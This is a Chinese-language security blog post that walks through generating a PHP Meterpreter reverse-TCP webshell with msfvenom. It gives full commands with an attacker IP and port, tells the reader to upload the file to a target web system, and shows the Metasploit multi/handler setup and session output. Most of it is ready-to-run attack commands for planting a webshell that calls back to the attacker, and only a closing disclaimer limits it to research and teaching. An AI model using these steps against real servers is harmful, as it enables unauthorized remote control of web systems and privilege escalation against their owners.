Metasploit之生成webshell及应用

颓废
颓废
颓废
441
文章
0
评论
2019年5月19日10:18:10评论587 views字数 1228阅读4分5秒阅读模式

Metasploit之生成webshell及应用
参考文献:http://www.huo119.com/post/909.shtm                        -->比较重要
          http://www.itnpc.com/news/web/144954023528337.html         -->较为详细,有拓展
          http://www.freebuf.com/articles/web/6740.html              -->使用“msfpayload”
          http://www.myhack58.com/Article/html/3/8/2013/41068.htm    -->较少,内容杂乱

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.2.146 R > test.php
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.2.146 -f raw > test.php
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=5555 R > test3.php

以上三个命令生成的php-webshell的回显是一样的,并且文件字节大小也是一样的

命令解析
msfvenom -p            -->选用模块

LHOST=192.168.2.146    -->设置反向连接者(攻击者)IP

LPORT=5555             -->设置反向连接者(攻击者)端口

-f                     -->生成的文件格式

生成文件在Home文件夹下,为test.php

将生成的文件作为php大小马看待上传web系统,之后直接利用metasploit进行连接提权

use exploit/multi/handler                  -->反弹会话连接

set PAYLOAD php/meterpreter/reverse_tcp    -->选用对应的模块

show options                               -->查看设置选项

set LHOST 192.168.2.146                    -->设置攻击者的反向连接IP

set LPORT 4444             -->设置攻击者的反向连接端口(需和webshell的配置一样)

exploit                    -->执行等待

触发方式就是直接访问我们的webshell地址,返回信息:
[*] Started reverse TCP handler on 192.168.2.146:4444 
[*] Starting the payload handler...
访问后即可得到反向连接信息:
meterpreter >

exectue    -->执行命令,例如:exectue -h  查看帮助

shell      -->获取一个shell

PS:meterpreter下的命令,Windows、Android、webshell基本都是一致的。

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
颓废
  • 本文由 发表于 2019年5月19日10:18:10
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Metasploit之生成webshell及应用https://cn-sec.com/archives/67387.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息